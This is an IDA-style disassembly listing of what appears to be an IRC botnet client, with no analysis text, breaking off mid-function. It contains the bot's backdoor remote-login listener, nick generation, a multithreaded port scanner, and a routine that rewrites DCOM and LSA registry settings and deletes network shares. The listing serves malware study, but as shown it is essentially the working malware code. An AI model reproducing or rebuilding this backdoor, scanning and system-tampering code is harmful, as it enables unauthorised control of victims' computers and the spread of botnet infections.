var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_218]
rep movsd
xor esi, esi
inc esi
mov [eax+1DCh], esi
lea eax, [ebp+var_5A8]
push eax
push 202h
call dword_43A3CC ; WSAStartup
xor ebx, ebx
cmp eax, ebx
jz short loc_410BD5
push eax
push offset aRlogindErrorWs ; "[RLOGIND]: Error: WSAStartup(): <%d>."
call sub_401F83
push [ebp+var_50]
call sub_4139F6
add esp, 0Ch
loc_410BCF: ; CODE XREF: sub_410B7C+8B�j
push esi
jmp loc_410DF1
; ---------------------------------------------------------------------------
loc_410BD5: ; CODE XREF: sub_410B7C+3B�j
push esi
push offset sub_410919
call dword_422118 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_410C09
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to install control-C "...
call sub_401F83
pop ecx
pop ecx
call dword_43A4DC ; WSACleanup
push [ebp+var_50]
call sub_4139F6
pop ecx
jmp short loc_410BCF
; ---------------------------------------------------------------------------
loc_410C09: ; CODE XREF: sub_410B7C+67�j
push [ebp+var_54]
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_24], 2
call dword_43A514 ; ntohs
push 6
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_43A3BC ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_410D81
mov ecx, [ebp+var_50]
imul ecx, 234h
push 10h
pop edi
mov dword_43B26C[ecx], eax
push edi
lea ecx, [ebp+var_24]
push ecx
push eax
call dword_43A49C ; bind
test eax, eax
jnz loc_410D81
push 7FFFFFFFh
push [ebp+arg_0]
call dword_43A4E8 ; listen
test eax, eax
jnz loc_410D81
push offset aRlogindReadyAn ; "[RLOGIND]: Ready and waiting for incomi"...
mov [ebp+var_14], 0Ch
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_401F0F
pop ecx
mov [ebp+var_8], esi
jmp loc_410D60
; ---------------------------------------------------------------------------
loc_410C9B: ; CODE XREF: sub_410B7C+1FD�j
push [ebp+var_8]
lea eax, [ebp+var_8]
push eax
push 8
push 0FFFFh
push esi
call dword_43A3D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_410D60
push [ebp+var_50]
movzx eax, [ebp+var_32]
push eax
push [ebp+var_30]
mov [ebp+var_3C], ebx
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_418]
push offset aRlogindClientC ; "[RLOGIND]: Client connection from IP: %"...
push eax
call sub_416975
lea eax, [ebp+var_418]
push eax
call sub_401F0F
push esi
lea eax, [ebp+var_418]
push 7
push eax
call sub_413732
mov ecx, [ebp+var_50]
mov [ebp+var_4C], eax
imul eax, 234h
add esp, 24h
mov dword_43B264[eax], ecx
lea eax, [ebp+var_38]
push eax
push ebx
lea eax, [ebp+var_218]
push eax
push offset sub_410970
push ebx
lea eax, [ebp+var_14]
push eax
call dword_42200C ; CreateThread
mov ecx, [ebp+var_4C]
imul ecx, 234h
cmp eax, ebx
mov dword_43B274[ecx], eax
jnz short loc_410D5B
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to start client threa"...
call sub_401F83
pop ecx
pop ecx
jmp short loc_410D84
; ---------------------------------------------------------------------------
loc_410D53: ; CODE XREF: sub_410B7C+1E2�j
push 32h
call dword_422000 ; Sleep
loc_410D5B: ; CODE XREF: sub_410B7C+1C0�j
cmp [ebp+var_3C], ebx
jz short loc_410D53
loc_410D60: ; CODE XREF: sub_410B7C+11A�j
; sub_410B7C+137�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
mov [ebp+var_4], edi
call dword_43A37C ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz loc_410C9B
jmp short loc_410D84
; ---------------------------------------------------------------------------
loc_410D81: ; CODE XREF: sub_410B7C+BD�j
; sub_410B7C+E3�j ...
mov esi, [ebp+arg_0]
loc_410D84: ; CODE XREF: sub_410B7C+1D5�j
; sub_410B7C+203�j
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+var_418]
push offset aRlogindError_0 ; "[RLOGIND]: Error: server failed, return"...
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_40], ebx
jnz short loc_410DC4
push ebx
push [ebp+var_44]
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_218]
call sub_405D62
add esp, 14h
loc_410DC4: ; CODE XREF: sub_410B7C+226�j
lea eax, [ebp+var_418]
push eax
call sub_401F0F
pop ecx
push esi
call dword_43A4D0 ; closesocket
push [ebp+arg_0]
call dword_43A4D0 ; closesocket
call dword_43A4DC ; WSACleanup
push [ebp+var_50]
call sub_4139F6
pop ecx
push ebx
loc_410DF1: ; CODE XREF: sub_410B7C+54�j
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_410B7C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_410DF8 proc near ; CODE XREF: sub_411114+6C�p
; DATA XREF: .text:off_4301D8�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call dword_422004 ; GetTickCount
push eax
call sub_416B24
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aSoul ; "[SOUL]"
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_416BCD
xor esi, esi
add esp, 10h
cmp dword_42FCD8, esi
jle short loc_410E51
loc_410E2B: ; CODE XREF: sub_410DF8+57�j
call sub_416B31
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_416BCD
add esp, 14h
inc esi
cmp esi, dword_42FCD8
jl short loc_410E2B
loc_410E51: ; CODE XREF: sub_410DF8+31�j
mov eax, edi
pop edi
pop esi
retn
sub_410DF8 endp
; =============== S U B R O U T I N E =======================================
sub_410E56 proc near ; CODE XREF: sub_409848+32FF�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call dword_422004 ; GetTickCount
push eax
call sub_416B24
pop ecx
call sub_416B31
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, dword_42FCD8
test esi, esi
jle short loc_410E99
loc_410E83: ; CODE XREF: sub_410E56+41�j
call sub_416B31
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_410E83
loc_410E99: ; CODE XREF: sub_410E56+2B�j
and byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_410E56 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call dword_422004 ; GetTickCount
push eax
call sub_416B24
pop ecx
lea eax, [ebp-4]
push eax
mov esi, offset aPc ; "PC"
push esi
call dword_4220DC ; GetComputerNameA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_416BCD
xor esi, esi
add esp, 0Ch
cmp dword_42FCD8, esi
jle short loc_410F0C
loc_410EE6: ; CODE XREF: .text:00410F0A�j
call sub_416B31
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_416BCD
add esp, 14h
inc esi
cmp esi, dword_42FCD8
jl short loc_410EE6
loc_410F0C: ; CODE XREF: .text:00410EE4�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call dword_422004 ; GetTickCount
push eax
call sub_416B24
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call dword_42211C ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_416BCD
xor esi, esi
add esp, 10h
cmp dword_42FCD8, esi
jle short loc_410F81
loc_410F5B: ; CODE XREF: .text:00410F7F�j
call sub_416B31
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_416BCD
add esp, 14h
inc esi
cmp esi, dword_42FCD8
jl short loc_410F5B
loc_410F81: ; CODE XREF: .text:00410F59�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-74h]
sub esp, 94h
push esi
push edi
lea eax, [ebp-20h]
push eax
mov esi, 422B02h
mov dword ptr [ebp-20h], 94h
call dword_422120 ; GetVersionExA
call dword_422004 ; GetTickCount
push eax
call sub_416B24
cmp dword ptr [ebp-1Ch], 4
pop ecx
jnz short loc_410FF5
cmp dword ptr [ebp-18h], 0
jnz short loc_410FDB
cmp dword ptr [ebp-10h], 1
jnz short loc_410FCE
mov esi, offset a95 ; "95"
loc_410FCE: ; CODE XREF: .text:00410FC7�j
cmp dword ptr [ebp-10h], 2
jnz short loc_411025
mov esi, offset aNt ; "NT"
jmp short loc_411025
; ---------------------------------------------------------------------------
loc_410FDB: ; CODE XREF: .text:00410FC1�j
cmp dword ptr [ebp-18h], 0Ah
jnz short loc_410FE8
mov esi, offset a98 ; "98"
jmp short loc_411025
; ---------------------------------------------------------------------------
loc_410FE8: ; CODE XREF: .text:00410FDF�j
cmp dword ptr [ebp-18h], 5Ah
jnz short loc_411020
mov esi, offset aMe_0 ; "ME"
jmp short loc_411025
; ---------------------------------------------------------------------------
loc_410FF5: ; CODE XREF: .text:00410FBB�j
cmp dword ptr [ebp-1Ch], 5
jnz short loc_411020
cmp dword ptr [ebp-18h], 0
jnz short loc_411008
mov esi, offset a2k ; "2K"
jmp short loc_411025
; ---------------------------------------------------------------------------
loc_411008: ; CODE XREF: .text:00410FFF�j
cmp dword ptr [ebp-18h], 1
jnz short loc_411015
mov esi, offset aXp_0 ; "XP"
jmp short loc_411025
; ---------------------------------------------------------------------------
loc_411015: ; CODE XREF: .text:0041100C�j
cmp dword ptr [ebp-18h], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_411025
loc_411020: ; CODE XREF: .text:00410FEC�j
; .text:00410FF9�j
mov esi, offset a??? ; "???"
loc_411025: ; CODE XREF: .text:00410FD2�j
; .text:00410FD9�j ...
mov edi, [ebp+7Ch]
push esi
push offset aS_6 ; "[%s]"
push 1Ch
push edi
call sub_416BCD
xor esi, esi
add esp, 10h
cmp dword_42FCD8, esi
jle short loc_411069
loc_411043: ; CODE XREF: .text:00411067�j
call sub_416B31
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_416BCD
add esp, 14h
inc esi
cmp esi, dword_42FCD8
jl short loc_411043
loc_411069: ; CODE XREF: .text:00411041�j
mov eax, edi
pop edi
pop esi
add ebp, 74h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411072 proc near ; CODE XREF: sub_411114+80�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call dword_422004 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
call dword_43A418 ; FindWindowA
cmp esi, 1
jbe short loc_4110C1
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_4110AA
mov eax, 422B02h
loc_4110AA: ; CODE XREF: sub_411072+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_416BCD
add esp, 14h
jmp short loc_4110DB
; ---------------------------------------------------------------------------
loc_4110C1: ; CODE XREF: sub_411072+28�j
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_4110CF
mov eax, 422B02h
loc_4110CF: ; CODE XREF: sub_411072+56�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416975
pop ecx
pop ecx
loc_4110DB: ; CODE XREF: sub_411072+4D�j
lea eax, [ebp+var_1C]
lea edx, [eax+1]
pop esi
loc_4110E2: ; CODE XREF: sub_411072+75�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4110E2
sub eax, edx
cmp eax, 2
jbe short loc_41110F
push 1Ch
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
call sub_416840
push 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_416A00
add esp, 18h
loc_41110F: ; CODE XREF: sub_411072+7C�j
mov eax, [ebp+arg_0]
leave
retn
sub_411072 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411114 proc near ; CODE XREF: sub_40946D+53�p
; sub_4096E9+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor edx, edx
xor edi, edi
loc_41111E: ; CODE XREF: sub_411114+62�j
mov esi, [ebp+arg_C]
test esi, esi
jz short loc_41115D
lea eax, dword_4301C8[edi]
loc_41112B: ; CODE XREF: sub_411114+33�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_41114D
test cl, cl
jz short loc_411149
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_41114D
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_41112B
loc_411149: ; CODE XREF: sub_411114+21�j
xor eax, eax
jmp short loc_411152
; ---------------------------------------------------------------------------
loc_41114D: ; CODE XREF: sub_411114+1D�j
; sub_411114+2B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_411152: ; CODE XREF: sub_411114+37�j
xor ecx, ecx
test eax, eax
setz cl
mov eax, ecx
jmp short loc_41116B
; ---------------------------------------------------------------------------
loc_41115D: ; CODE XREF: sub_411114+F�j
mov ecx, dword_4301D4[edi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_41116B: ; CODE XREF: sub_411114+47�j
test eax, eax
jnz short loc_41117A
add edi, 14h
inc edx
cmp edi, 64h
jb short loc_41111E
jmp short loc_411188
; ---------------------------------------------------------------------------
loc_41117A: ; CODE XREF: sub_411114+59�j
push [ebp+arg_0]
lea eax, [edx+edx*4]
call off_4301D8[eax*4]
pop ecx
loc_411188: ; CODE XREF: sub_411114+64�j
cmp [ebp+arg_8], 0
pop edi
pop esi
pop ebx
jz short loc_41119C
push [ebp+arg_0]
call sub_411072
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41119C: ; CODE XREF: sub_411114+7B�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_411114 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4111A1 proc near ; DATA XREF: sub_411263+77�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0B8h
mov eax, [ebp+74h+arg_0]
push esi
push edi
mov esi, eax
push 2Ah
pop ecx
lea edi, [ebp+74h+var_B8]
rep movsd
push [ebp+74h+var_34]
xor esi, esi
inc esi
mov [eax+0A4h], esi
xor eax, eax
lea edi, [ebp+74h+var_10]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_10], 2
call dword_43A514 ; ntohs
push 6
mov [ebp+74h+var_E], ax
mov eax, [ebp+74h+var_28]
push esi
push 2
mov [ebp+74h+var_C], eax
call dword_43A3BC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_411251
push 10h
lea eax, [ebp+74h+var_10]
push eax
push esi
call dword_43A36C ; connect
mov ecx, [ebp+74h+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_43B26C[ecx], esi
jz short loc_411251
push [ebp+74h+var_34]
push [ebp+74h+var_28]
call dword_43A440 ; inet_ntoa
push eax
push offset aScanIpSPortD_0 ; "[SCAN]: IP: %s Port: %d is open."
mov edi, offset dword_480B40
push edi
call sub_416975
push 0
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_B4]
push edi
push eax
push [ebp+74h+var_B8]
call sub_405D62
push edi
call sub_401F0F
add esp, 28h
loc_411251: ; CODE XREF: sub_4111A1+55�j
; sub_4111A1+76�j
push esi
call dword_43A4D0 ; closesocket
pop edi
xor eax, eax
pop esi
add ebp, 74h
leave
retn 4
sub_4111A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_411263 proc near ; DATA XREF: sub_409848+2975�o
var_12C = byte ptr -12Ch
var_AC = byte ptr -0ACh
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 12Ch
push ebx
mov ebx, [ebp+74h+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, ebx
lea edi, [ebp+74h+var_AC]
rep movsd
mov esi, dword_422000
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_411290: ; CODE XREF: sub_411263+C1�j
push [ebp+74h+var_28]
push [ebp+74h+var_1C]
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_12C]
push offset aScanScanningIp ; "[SCAN]: Scanning IP: %s, Port: %d."
push eax
call sub_416975
push 1FFh
lea eax, [ebp+74h+var_12C]
push eax
mov eax, [ebp+74h+var_20]
imul eax, 234h
add eax, offset dword_43B060
push eax
call sub_416A00
add esp, 1Ch
lea eax, [ebp+74h+var_4]
push eax
push edi
lea eax, [ebp+74h+var_AC]
push eax
push offset sub_4111A1
push edi
push edi
call dword_42200C ; CreateThread
cmp eax, edi
mov [ebp+74h+arg_0], eax
jz short loc_4112F9
jmp short loc_4112F4
; ---------------------------------------------------------------------------
loc_4112F0: ; CODE XREF: sub_411263+94�j
push 32h
call esi ; Sleep
loc_4112F4: ; CODE XREF: sub_411263+8B�j
cmp [ebp+74h+var_8], edi
jz short loc_4112F0
loc_4112F9: ; CODE XREF: sub_411263+89�j
push [ebp+74h+arg_0]
call dword_42202C ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
push [ebp+74h+var_1C]
call dword_43A494 ; ntohl
inc eax
push eax
call dword_43A4EC ; ntohl
mov [ebp+74h+var_1C], eax
jmp loc_411290
sub_411263 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411329 proc near ; CODE XREF: sub_411969+8�p
; sub_411987+37�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_43A528, edi
jnz loc_41145C
lea eax, [ebp+var_4]
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_43A4F0 ; RegOpenKeyExA
test eax, eax
jnz short loc_4113B5
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 4Eh
lea edx, [eax+1]
loc_41136D: ; CODE XREF: sub_411329+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41136D
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_43A3A0 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_41139D
push offset aSecureDisableD ; "[SECURE]: Disable DCOM failed."
jmp short loc_4113A2
; ---------------------------------------------------------------------------
loc_41139D: ; CODE XREF: sub_411329+6B�j
push offset aSecureDcomDisa ; "[SECURE]: DCOM disabled."
loc_4113A2: ; CODE XREF: sub_411329+72�j
push eax
call sub_416975
pop ecx
pop ecx
push [ebp+var_4]
call dword_43A4A0 ; RegCloseKey
jmp short loc_4113C8
; ---------------------------------------------------------------------------
loc_4113B5: ; CODE XREF: sub_411329+36�j
lea eax, [ebp+var_214]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_416975
pop ecx
pop ecx
loc_4113C8: ; CODE XREF: sub_411329+8A�j
cmp [ebp+arg_C], edi
jnz short loc_4113E7
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_4113E7: ; CODE XREF: sub_411329+A2�j
lea eax, [ebp+var_214]
push eax
call sub_401F0F
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_43A4F0 ; RegOpenKeyExA
test eax, eax
jnz short loc_411455
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_43A3A0 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_41143D
push offset aSecureFailed_1 ; "[SECURE]: Failed to restrict access to "...
jmp short loc_411442
; ---------------------------------------------------------------------------
loc_41143D: ; CODE XREF: sub_411329+10B�j
push offset aSecureRestrict ; "[SECURE]: Restricted access to the IPC$"...
loc_411442: ; CODE XREF: sub_411329+112�j
push eax
call sub_416975
pop ecx
pop ecx
push [ebp+var_4]
call dword_43A4A0 ; RegCloseKey
jmp short loc_41146F
; ---------------------------------------------------------------------------
loc_411455: ; CODE XREF: sub_411329+E3�j
push offset aSecureFailed_2 ; "[SECURE]: Failed to open IPC$ Restricti"...
jmp short loc_411461
; ---------------------------------------------------------------------------
loc_41145C: ; CODE XREF: sub_411329+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_411461: ; CODE XREF: sub_411329+131�j
lea eax, [ebp+var_214]
push eax
call sub_416975
pop ecx
pop ecx
loc_41146F: ; CODE XREF: sub_411329+12A�j
cmp [ebp+arg_C], edi
jnz short loc_41148E
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_41148E: ; CODE XREF: sub_411329+149�j
lea eax, [ebp+var_214]
push eax
call sub_401F0F
cmp dword_43A550, edi
pop ecx
jnz loc_41160B
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
push ebx
loc_4114B1: ; CODE XREF: sub_411329+2C6�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push edi
call dword_43A4C4
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_411550
cmp eax, 0EAh
jz short loc_411550
xor esi, esi
loc_4114DF: ; CODE XREF: sub_411329+220�j
push off_430230[esi]
push edi
call sub_407C93
pop ecx
pop ecx
push off_430230[esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_411504
push offset aSecureShareSDe ; "[SECURE]: Share '%s' deleted."
jmp short loc_411509
; ---------------------------------------------------------------------------
loc_411504: ; CODE XREF: sub_411329+1D2�j
push offset aSecureFailed_3 ; "[SECURE]: Failed to delete '%s' share."
loc_411509: ; CODE XREF: sub_411329+1D9�j
push 200h
push eax
call sub_416BCD
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_411536
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_411536: ; CODE XREF: sub_411329+1F1�j
lea eax, [ebp+var_214]
push eax
call sub_401F0F
add esi, 8
cmp esi, 20h
pop ecx
jb short loc_4114DF
jmp loc_4115E8
; ---------------------------------------------------------------------------
loc_411550: ; CODE XREF: sub_411329+1AB�j
; sub_411329+1B2�j
mov esi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+var_4], ebx
jb loc_4115DF
loc_41155F: ; CODE XREF: sub_411329+2B2�j
mov edi, [esi]
push edi
call sub_417F3E
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_4115D4
push edi
call sub_407BA7
push eax
push 0
call sub_407C93
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_411594
push offset aSecureShareS_0 ; "[SECURE]: Share '%S' deleted."
jmp short loc_411599
; ---------------------------------------------------------------------------
loc_411594: ; CODE XREF: sub_411329+262�j
push offset aSecureFailed_4 ; "[SECURE]: Failed to delete '%S' share."
loc_411599: ; CODE XREF: sub_411329+269�j
push 200h
push eax
call sub_416BCD
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_4115C7
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_4115C7: ; CODE XREF: sub_411329+282�j
lea eax, [ebp+var_214]
push eax
call sub_401F0F
pop ecx
loc_4115D4: ; CODE XREF: sub_411329+245�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_41155F
xor edi, edi
loc_4115DF: ; CODE XREF: sub_411329+230�j
push [ebp+var_8]
call dword_43A3F8
loc_4115E8: ; CODE XREF: sub_411329+222�j
cmp [ebp+var_10], 0EAh
jz loc_4114B1
lea eax, [ebp+var_214]
push offset aSecureNetworkS ; "[SECURE]: Network shares deleted."
push eax
call sub_416975
pop ecx
pop ecx
pop ebx
jmp short loc_41161E
; ---------------------------------------------------------------------------
loc_41160B: ; CODE XREF: sub_411329+178�j
lea eax, [ebp+var_214]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_416975
pop ecx
pop ecx
loc_41161E: ; CODE XREF: sub_411329+2E0�j
cmp [ebp+arg_C], edi
jnz short loc_41163C
push edi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_41163C: ; CODE XREF: sub_411329+2F8�j
lea eax, [ebp+var_214]
push eax
call sub_401F0F
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_411329 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411650 proc near ; CODE XREF: sub_411987:loc_4119C5�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_43A528, ebx
push esi
jnz loc_41177F
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_43A4F0 ; RegOpenKeyExA
test eax, eax
jnz short loc_4116DC
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 59h
lea edx, [eax+1]
loc_411694: ; CODE XREF: sub_411650+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411694
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_43A3A0 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_4116C4
push offset aSecureEnableDc ; "[SECURE]: Enable DCOM failed."
jmp short loc_4116C9
; ---------------------------------------------------------------------------
loc_4116C4: ; CODE XREF: sub_411650+6B�j
push offset aSecureDcomEnab ; "[SECURE]: DCOM enabled."
loc_4116C9: ; CODE XREF: sub_411650+72�j
push eax
call sub_416975
pop ecx
pop ecx
push [ebp+var_4]
call dword_43A4A0 ; RegCloseKey
jmp short loc_4116EF
; ---------------------------------------------------------------------------
loc_4116DC: ; CODE XREF: sub_411650+36�j
lea eax, [ebp+var_220]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_416975
pop ecx
pop ecx
loc_4116EF: ; CODE XREF: sub_411650+8A�j
cmp [ebp+arg_C], ebx
jnz short loc_41170E
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_41170E: ; CODE XREF: sub_411650+A2�j
lea eax, [ebp+var_220]
push eax
call sub_401F0F
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_43A4F0 ; RegOpenKeyExA
test eax, eax
jnz short loc_411778
push 4
lea eax, [ebp+var_8]
push eax
push 4
push ebx
